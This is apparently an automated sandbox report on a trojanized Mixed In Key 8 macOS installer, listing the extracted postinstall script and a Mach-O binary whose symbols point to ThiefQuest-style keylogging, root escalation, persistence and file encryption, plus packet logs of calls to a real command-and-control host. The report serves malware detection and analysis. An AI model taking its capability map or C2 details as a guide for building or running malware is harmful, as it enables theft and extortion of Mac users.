File size:	82
File type:	AppleDouble encoded Macintosh file

Extracted File
File path:	Mixed_In_Key_8.pkg/Scripts/Scripts/._postinstall
File size:	82
File type:	AppleDouble encoded Macintosh file

Extracted File
File path:	Mixed_In_Key_8.pkg/Scripts/Scripts/postinstall
File size:	190
File type:	POSIX shell script, ASCII text executable

Extracted File
File path:	Mixed_In_Key_8.pkg/Scripts/Utils/patch
File size:	87920
File type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>

Static Mach Info

General Information for header 1
Endian:	<
Size:	64-bit
Architecture:	x86_64
Filetype:	execute
Nbr. of load commands:	18
Entry point:	0xBD80

segment_command_64 aggregated: 4

Name	Value
segname	__PAGEZERO
vmaddr	0x0
vmsize	0x100000000
fileoff	0x0
filesize	0x0
maxprot	0x0
initprot	0x0
nsects	0
flags	0x0

Name

Value

segname

__TEXT

vmaddr

0x100000000

vmsize

0x13000

fileoff

0x0

filesize

0x13000

maxprot

0x5

initprot

0x5

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__text	__TEXT	0x100000C20	0xF1C5	0xC20	5.5737	0x4	0x0	0	0x80000400
__stubs	__TEXT	0x10000FDE6	0x21C	0xFDE6	3.3336	0x1	0x0	0	0x80000408
__stub_helper	__TEXT	0x100010004	0x394	0x10004	4.4316	0x2	0x0	0	0x80000400
__const	__TEXT	0x1000103A0	0x20D	0x103A0	2.7902	0x4	0x0	0	0x0
__cstring	__TEXT	0x1000105AD	0x2A09	0x105AD	5.8282	0x0	0x0	0	0x2
__unwind_info	__TEXT	0x100012FB8	0x48	0x12FB8	1.5828	0x2	0x0	0	0x0

Name

Value

segname

__DATA

vmaddr

0x100013000

vmsize

0x1000

fileoff

0x13000

filesize

0x1000

maxprot

0x3

initprot

0x3

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__nl_symbol_ptr	__DATA	0x100013000	0x8	0x13000	-0.0000	0x3	0x0	0	0x6
__got	__DATA	0x100013008	0x28	0x13008	-0.0000	0x3	0x0	0	0x6
__la_symbol_ptr	__DATA	0x100013030	0x2D0	0x13030	2.4629	0x3	0x0	0	0x7
__const	__DATA	0x100013300	0x340	0x13300	2.7902	0x4	0x0	0	0x0
__cfstring	__DATA	0x100013640	0x20	0x13640	1.3095	0x3	0x0	0	0x0
__data	__DATA	0x100013660	0xA8	0x13660	2.7841	0x4	0x0	0	0x0
__common	__DATA	0x100013708	0x38	0x0	-0.0000	0x3	0x0	0	0x1

Name	Value
segname	__LINKEDIT
vmaddr	0x100014000
vmsize	0x1770
fileoff	0x14000
filesize	0x1770
maxprot	0x1
initprot	0x1
nsects	0
flags	0x0

dyld_info_command aggregated: 1

Name	Value
rebase_off	81920
rebase_size	24
bind_off	81944
bind_size	168
weak_bind_off	0
weak_bind_size	0
lazy_bind_off	82112
lazy_bind_size	1760
export_off	83872
export_size	3040

symtab_command aggregated: 1

Name	Value
symoff	87168
nsyms	0
stroff	87912
strsize	8

dysymtab_command aggregated: 1

Name	Value
ilocalsym	0
nlocalsym	0
iextdefsym	0
nextdefsym	0
iundefsym	0
nundefsym	0
tocoff	0
ntoc	0
modtaboff	0
nmodtab	0
extrefsymoff	0
nextrefsyms	0
indirectsymoff	87168
nindirectsyms	186
extreloff	0
nextrel	0
locreloff	0
nlocrel	0

dylinker_command aggregated: 1

Name

Value

name

Datas

/usr/lib/dyld

uuid_command aggregated: 1

Name	Value
uuid	b'3\xdd\x1b+\rB81\xac\x82\xc7\tU/\xe5\xf6'

version_min_command aggregated: 1

Name	Value
version	657920
sdk	659200

source_version_command aggregated: 1

Name	Value
version	0

entry_point_command aggregated: 1

Name	Value
entryoff	48512
stacksize	0

dylib_command aggregated: 4

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1281.0.0

compatibility_version

1.0.0

Datas

/usr/lib/libSystem.B.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1673.126.0

compatibility_version

150.0.0

Datas

/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1348.12.4

compatibility_version

64.0.0

Datas

/System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

59306.41.2

compatibility_version

1.0.0

Datas

/System/Library/Frameworks/Security.framework/Versions/A/Security

linkedit_data_command aggregated: 2

Name	Value
dataoff	86912
datasize	248

Name	Value
dataoff	87160
datasize	8

Internal Symbols

_EI_INSTSGN

_EI_INSTSGN_C

_EI_RESCUE

_EI_SELFNAMES

_EI_SELFNAMES_C

_EI_UNWANTED

_EI_UNWANTED_C

__check_if_targeted

__construct_plist_path

__dispatch

__ei_init_crc32_tab

__ei_rootgainer_elevate

__generate_xkey

__get_host_identifier

__get_process_list

__home_stub

__is_target

__make_temp_name

__mh_execute_header

__pack_trailer

__react_exec

__react_host

__react_keys

__react_ping

__react_save

__react_scmd

__react_start

__rotate

__tp_decrypt

__tp_encrypt

__unpack_trailer

_acquire_root

_append_ei

_bbbb

_build_plist

_carve_target

_check_file_exists

_check_if_running

_check_key

_check_modification

_cnt_askroot

_cnt_failed_asks

_create_rescue_executable

_ei_carver_main

_ei_forensic_sendfile

_ei_forensic_thread

_ei_get_host_info

_ei_get_macaddr

_ei_loader_main

_ei_loader_thread

_ei_pers_thread

_ei_persistence_main

_ei_read_spot

_ei_rootgainer_main

_ei_run_file

_ei_run_memory_hrd

_ei_run_thread

_ei_save_spot

_ei_selfretain_main

_ei_str

_ei_str_encode

_ei_timer_check

_ei_timer_create

_ei_timer_start

_ei_timer_stop

_ei_tpyrc_checksum

_eib_decode

_eib_encode

_eib_pack_c

_eib_secure_decode

_eib_secure_encode

_eib_string_fa

_eib_string_key

_eib_unpack_i

_eic_save_message

_eic_signature

_eicc_deserialize_request

_eicc_make_request

_eicc_serialize_request

_eicmn_communicate

_eicmn_launch_helper

_eicmn_show_alert

_eiht_append_command

_eiht_check_command

_eiht_drop_ccache

_eiht_get_update

_eilf_rglk_watch_routine

_eip_decrypt

_eip_encrypt

_eip_key

_eip_seeds

_extended_check_modification

_extract_ei

_get_mediator

_get_targets

_http_request

_http_request_f

_install_daemon

_is_carved

_is_debugging

_is_executable

_is_file_target

_is_lfsc_target

_is_virtual_mchn

_kconvert

_kill_unwanted

_lfsc_dirlist

_lfsc_get_contents

_lfsc_match

_lfsc_pack_binary

_lfsc_parse_template

_lfsc_unpack_binary

_main

_mediated

_persist_executable

_persist_executable_frombundle

_prevent_trace

_priv_rescue_data

_priv_rescue_data_s

_process_event

_random_key

_release_events

_resque_myself

_run_as_admin

_run_as_admin_async

_run_daemon

_run_daemon_u

_run_regular

_run_regular_async

_run_target

_s_append_or_not

_s_carve_or_not

_s_get_spot

_s_is_high_time

_s_random_action

_s_save_spot

_set_important_files

_set_resque_data

_sleepy

_syncsem

_th_cmd_async

_tpcrypt

_tpdcrypt

_uncarve_target

_urlsafe

_user_info

External symbols

_AuthorizationCopyRights

_AuthorizationCreate

_CFBundleCreate

_CFBundleGetFunctionPointerForName

_CFMachPortCreateRunLoopSource

_CFRelease

_CFRunLoopAddSource

_CFRunLoopGetCurrent

_CFRunLoopRun

_CFURLCreateFromFileSystemRepresentation

_CGEventGetIntegerValueField

_CGEventTapCreate

_CGEventTapEnable

_NSAddressOfSymbol

_NSCreateObjectFileImageFromMemory

_NSDestroyObjectFileImage

_NSLinkModule

_NSLookupSymbolInModule

_NSUnLinkModule

_NXFindBestFatArch

_NXGetLocalArchInfo

___assert_rtn

___error

___memcpy_chk

___memset_chk

___sprintf_chk

___stack_chk_fail

_calloc

_chmod

_close

_closedir

_connect

_execl

_execv

_exit

_fclose

_fopen

_fork

_fread

_free

_fseek

_ftell

_ftrylockfile

_funlockfile

_fwrite

_getenv

_geteuid

_gethostbyname

_gethostname

_getlogin

_getpagesize

_getpid

_if_nametoindex

_kevent

_kill

_kqueue

_malloc

_memcpy

_memset

_mkdir

_nl_langinfo

_open

_opendir$INODE64

_popen

_printf

_pthread_create

_ptrace

_random

_read

_readdir$INODE64

_realloc

_rename

_sleep

_socket

_srandom

_stat$INODE64

_strcasestr

_strcmp

_strerror

_strlen

_strrchr

_strstr

_sysctl

_system

_time

_uname

_unlink

_vm_allocate

_vm_deallocate

_write

Extracted File
File path:	Mixed_In_Key_8.pkg/Scripts/postinstall
File size:	190
File type:	POSIX shell script, ASCII text executable

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/07/21-19:14:55.614810	UDP	2030613	ET TROJAN ThiefQuest CnC Domain in DNS Lookup	51353	53	192.168.11.11	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 7, 2021 19:13:53.166791916 CEST	49241	443	192.168.11.11	17.171.27.65
Jun 7, 2021 19:13:53.166881084 CEST	49241	443	192.168.11.11	17.171.27.65
Jun 7, 2021 19:13:53.268764973 CEST	443	49241	17.171.27.65	192.168.11.11
Jun 7, 2021 19:13:53.268826962 CEST	443	49241	17.171.27.65	192.168.11.11
Jun 7, 2021 19:13:53.269782066 CEST	49241	443	192.168.11.11	17.171.27.65
Jun 7, 2021 19:14:19.986861944 CEST	49249	80	192.168.11.11	17.253.37.204
Jun 7, 2021 19:14:20.005261898 CEST	80	49249	17.253.37.204	192.168.11.11
Jun 7, 2021 19:14:20.005775928 CEST	49249	80	192.168.11.11	17.253.37.204
Jun 7, 2021 19:14:55.634922981 CEST	49252	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:55.739636898 CEST	80	49252	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:55.740082026 CEST	49252	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:55.740170002 CEST	49252	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:55.844974041 CEST	80	49252	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:55.845295906 CEST	80	49252	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:55.845366001 CEST	80	49252	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:55.845413923 CEST	80	49252	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:55.845913887 CEST	49252	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:55.846004009 CEST	49252	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:55.847099066 CEST	49252	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:55.847183943 CEST	49252	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:55.952029943 CEST	80	49252	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:56.162070036 CEST	49253	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:56.263219118 CEST	80	49253	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:56.263690948 CEST	49253	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:56.336185932 CEST	49253	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:56.437122107 CEST	80	49253	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:56.437496901 CEST	80	49253	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:56.437623024 CEST	80	49253	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:56.437634945 CEST	80	49253	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:56.438574076 CEST	49253	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:56.438585043 CEST	49253	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:56.443119049 CEST	49253	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:56.738460064 CEST	49253	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:56.839554071 CEST	80	49253	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:58.199925900 CEST	49254	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:58.300640106 CEST	80	49254	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:58.301192045 CEST	49254	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:58.301285028 CEST	49254	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:58.402050018 CEST	80	49254	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:58.402154922 CEST	80	49254	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:58.402209997 CEST	80	49254	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:58.402256012 CEST	80	49254	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:58.402729034 CEST	49254	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:58.402817965 CEST	49254	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:58.402831078 CEST	49254	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:58.402839899 CEST	49254	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:58.503446102 CEST	80	49254	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:58.836679935 CEST	49255	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:58.941607952 CEST	80	49255	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:58.942094088 CEST	49255	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:58.942178965 CEST	49255	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:59.047215939 CEST	80	49255	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:59.047353029 CEST	80	49255	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:59.047460079 CEST	80	49255	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:59.047509909 CEST	80	49255	35.173.69.207	192.168.11.11
Jun 7, 2021 19:14:59.048079014 CEST	49255	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:59.048168898 CEST	49255	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:59.048180103 CEST	49255	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:59.440867901 CEST	49255	80	192.168.11.11	35.173.69.207
Jun 7, 2021 19:14:59.545588017 CEST	80	49255	35.173.69.207	192.168.11.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 7, 2021 19:14:07.799541950 CEST	54223	53	192.168.11.11	1.1.1.1
Jun 7, 2021 19:14:07.808516026 CEST	53	54223	1.1.1.1	192.168.11.11
Jun 7, 2021 19:14:08.022803068 CEST	51498	53	192.168.11.11	1.1.1.1
Jun 7, 2021 19:14:08.031569958 CEST	53	51498	1.1.1.1	192.168.11.11
Jun 7, 2021 19:14:55.614809990 CEST	51353	53	192.168.11.11	1.1.1.1
Jun 7, 2021 19:14:55.634289026 CEST	53	51353	1.1.1.1	192.168.11.11
Jun 7, 2021 19:14:55.848387957 CEST	61860	53	192.168.11.11	1.1.1.1
Jun 7, 2021 19:14:55.856920004 CEST	53	61860	1.1.1.1	192.168.11.11
Jun 7, 2021 19:15:02.799745083 CEST	58259	53	192.168.11.11	1.1.1.1
Jun 7, 2021 19:15:02.809159040 CEST	53	58259	1.1.1.1	192.168.11.11
Jun 7, 2021 19:15:05.051491022 CEST	51508	53	192.168.11.11	1.1.1.1
Jun 7, 2021 19:15:05.064013004 CEST	53	51508	1.1.1.1	192.168.11.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 7, 2021 19:14:55.614809990 CEST	192.168.11.11	1.1.1.1	0x8a53	Standard query (0)	andrewka6.pythonanywhere.com	A (IP address)	IN (0x0001)
Jun 7, 2021 19:14:55.848387957 CEST	192.168.11.11	1.1.1.1	0xb8ec	Standard query (0)		256	256

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 7, 2021 19:14:55.634289026 CEST	1.1.1.1	192.168.11.11	0x8a53	No error (0)	andrewka6.pythonanywhere.com		35.173.69.207	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

andrewka6.pythonanywhere.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.11.11	49252	35.173.69.207	80

Timestamp	kBytes transferred	Direction	Data
Jun 7, 2021 19:14:55.740170002 CEST	78	OUT	GET /ret.txt HTTP/1.0 Host: andrewka6.pythonanywhere.com
Jun 7, 2021 19:14:55.845295906 CEST	79	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Jun 2021 17:14:55 GMT Content-Type: text/html Content-Length: 2921 Connection: close ETag: "6048c864-b69" Server: PythonAnywhere Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3a 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 72 65 62 75 63 68 65 74 20 4d 53 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 66 6f 72 2d 73 69 74 65 2d 6f 77 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2d 65 72 72 6f 72 2d 69 6d 61 67 65 73 2f 6c 6f 67 6f 2d 32 33 34 78 33 35 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 54 68 69 73 20 69 73 20 67 6f 69 6e 67 20 74 6f 20 62 65 20 61 6e 6f 74 68 65 72 20 67 72 65 61 74 20 77 65 62 73 69 74 65 20 68 6f 73 74 65 64 20 62 79 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2e 63 6f 6d 2f 22 3e 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 20 6c 65 74 73 20 79 6f 75 20 68 6f 73 74 2c 20 72 75 6e 2c 20 61 6e 64 20 63 6f 64 65 20 50 79 74 68 6f 6e 20 69 6e 20 74 68 65 20 63 6c 6f 75 64 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4f 75 72 20 66 72 65 65 20 70 6c 61 6e 20 67 69 76 65 73 20 79 6f 75 20 61 63 63 65 73 73 20 74 6f 20 6d 61 63 68 69 6e 65 73 20 77 69 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 76 65 72 79 74 68 69 6e 67 20 61 6c 72 65 61 64 79 20 73 65 74 20 75 70 20 66 6f 72 20 79 6f 75 2e 20 59 6f 75 Data Ascii: <html> <head> <title>Coming Soon: PythonAnywhere</title> <style> body { font-family: Helvetica, Arial, sans-serif; width: 500px; margin-left: auto; margin-right: auto; margin-top: 20px; } h1 { font-family: Trebuchet MS, Helvetica, Arial, sans-serif; } .for-site-owner { font-size: smaller; margin-top: 30px; color: gray; } </style> </head> <body> <img src="https://s3.amazonaws.com/pythonanywhere-error-images/logo-234x35.png" /> <div class="main"> <h1>Coming Soon!</h1> <p> This is going to be another great website hosted by <a href="https://www.pythonanywhere.com/">PythonAnywhere</a>. </p> <p> PythonAnywhere lets you host, run, and code Python in the cloud. Our free plan gives you access to machines with everything already set up for you. You
Jun 7, 2021 19:14:55.845366001 CEST	81	IN	Data Raw: 20 63 61 6e 20 64 65 76 65 6c 6f 70 20 61 6e 64 20 68 6f 73 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 72 20 61 6e 79 20 6f 74 68 65 72 20 63 6f 64 65 20 64 69 72 65 63 74 6c 79 20 66 72 6f 6d Data Ascii: can develop and host your website or any other code directly from your browser without having to install software or manage your own server. </p> <p> Need more power? Up
Jun 7, 2021 19:14:55.845413923 CEST	81	IN	Data Raw: 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 49 66 20 79 6f 75 27 72 65 20 68 61 76 69 6e 67 20 70 72 6f 62 6c 65 6d 73 20 67 65 Data Ascii: a>. </p> <p> If you're having problems getting it all working, drop us a line at support@pythonanywhere.com, or in <a href="https://www.pythonanywhere.com/forums/">the fo

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.11.11	49253	35.173.69.207	80

Timestamp	kBytes transferred	Direction	Data
Jun 7, 2021 19:14:56.336185932 CEST	82	OUT	GET /ret.txt HTTP/1.0 Host: andrewka6.pythonanywhere.com
Jun 7, 2021 19:14:56.437496901 CEST	83	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Jun 2021 17:14:56 GMT Content-Type: text/html Content-Length: 2921 Connection: close ETag: "6048c864-b69" Server: PythonAnywhere Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3a 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 72 65 62 75 63 68 65 74 20 4d 53 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 66 6f 72 2d 73 69 74 65 2d 6f 77 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2d 65 72 72 6f 72 2d 69 6d 61 67 65 73 2f 6c 6f 67 6f 2d 32 33 34 78 33 35 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 54 68 69 73 20 69 73 20 67 6f 69 6e 67 20 74 6f 20 62 65 20 61 6e 6f 74 68 65 72 20 67 72 65 61 74 20 77 65 62 73 69 74 65 20 68 6f 73 74 65 64 20 62 79 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2e 63 6f 6d 2f 22 3e 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 20 6c 65 74 73 20 79 6f 75 20 68 6f 73 74 2c 20 72 75 6e 2c 20 61 6e 64 20 63 6f 64 65 20 50 79 74 68 6f 6e 20 69 6e 20 74 68 65 20 63 6c 6f 75 64 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4f 75 72 20 66 72 65 65 20 70 6c 61 6e 20 67 69 76 65 73 20 79 6f 75 20 61 63 63 65 73 73 20 74 6f 20 6d 61 63 68 69 6e 65 73 20 77 69 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 76 65 72 79 74 68 69 6e 67 20 61 6c 72 65 61 64 79 20 73 65 74 20 75 70 20 66 6f 72 20 79 6f 75 2e 20 59 6f 75 Data Ascii: <html> <head> <title>Coming Soon: PythonAnywhere</title> <style> body { font-family: Helvetica, Arial, sans-serif; width: 500px; margin-left: auto; margin-right: auto; margin-top: 20px; } h1 { font-family: Trebuchet MS, Helvetica, Arial, sans-serif; } .for-site-owner { font-size: smaller; margin-top: 30px; color: gray; } </style> </head> <body> <img src="https://s3.amazonaws.com/pythonanywhere-error-images/logo-234x35.png" /> <div class="main"> <h1>Coming Soon!</h1> <p> This is going to be another great website hosted by <a href="https://www.pythonanywhere.com/">PythonAnywhere</a>. </p> <p> PythonAnywhere lets you host, run, and code Python in the cloud. Our 